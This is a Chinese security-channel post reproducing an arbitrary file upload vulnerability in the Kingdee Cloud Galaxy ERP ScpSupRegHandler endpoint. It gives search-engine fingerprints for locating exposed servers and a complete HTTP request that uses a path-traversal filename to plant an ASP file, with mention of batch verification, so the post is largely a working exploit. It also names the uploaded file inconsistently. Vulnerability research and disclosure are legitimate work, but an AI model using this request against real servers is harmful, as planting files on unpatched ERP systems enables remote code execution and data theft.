声明:此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!
现在只对常读和星标的公众号才展示大图推送,建议大家把猫蛋儿安全“设为星标”,否则可能看不到了!
产品简介
金蝶云星空管理中心是金蝶软件(中国)有限公司基于云计算、人工智能、物联网等前沿技术研发的新一代战略性企业管理软件。
漏洞简介
金蝶云星空是一款云端企业资源管理(ERP)软件,为企业提供财务管理、供应链管理以及业务流程管理等一体化解决方案。金蝶云星空管理中心ScpSupRegHandler接口存在任意文件上传漏洞。
指纹识别
fofa:icon_hash="-1629133697"zoomeye:app:"金蝶云星空
漏洞验证
poc:
POST /k3cloud/SRM/ScpSupRegHandler HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)Accept-Encoding: gzip, deflateAccept: */*Connection: closeCache-Control: max-age=0Content-Length: 405Content-Type: multipart/form-data; boundary=fd18dd968b553715cbc5a1982526199b--fd18dd968b553715cbc5a1982526199bContent-Disposition: form-data; name="FAtt"; filename="../../../../uploadfiles/76527.asp."Content-Type: text/plain<% Response.Write("738290225") %>--fd18dd968b553715cbc5a1982526199bContent-Disposition: form-data; name="FID"2022--fd18dd968b553715cbc5a1982526199bContent-Disposition: form-data; name="dbId_v".--fd18dd968b553715cbc5a1982526199b--
发送POC:
访问文件/K3Cloud/uploadfiles/6666666.asp:
批量验证:
漏洞收录
漏洞已收录于团队内部漏洞库(建设于2019年),现已收集4000+实战漏洞
现仅供团队内部使用,每月随机抽取关注者加入社群交流学习。
回复关键字【POC】获取POC下载链接
点击下方名片进入公众号,欢迎关注!
点个小赞你最好看
原文始发于微信公众号(猫蛋儿安全):【漏洞复现】金蝶云星空ScpSupRegHandler任意文件上传【附POC】
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论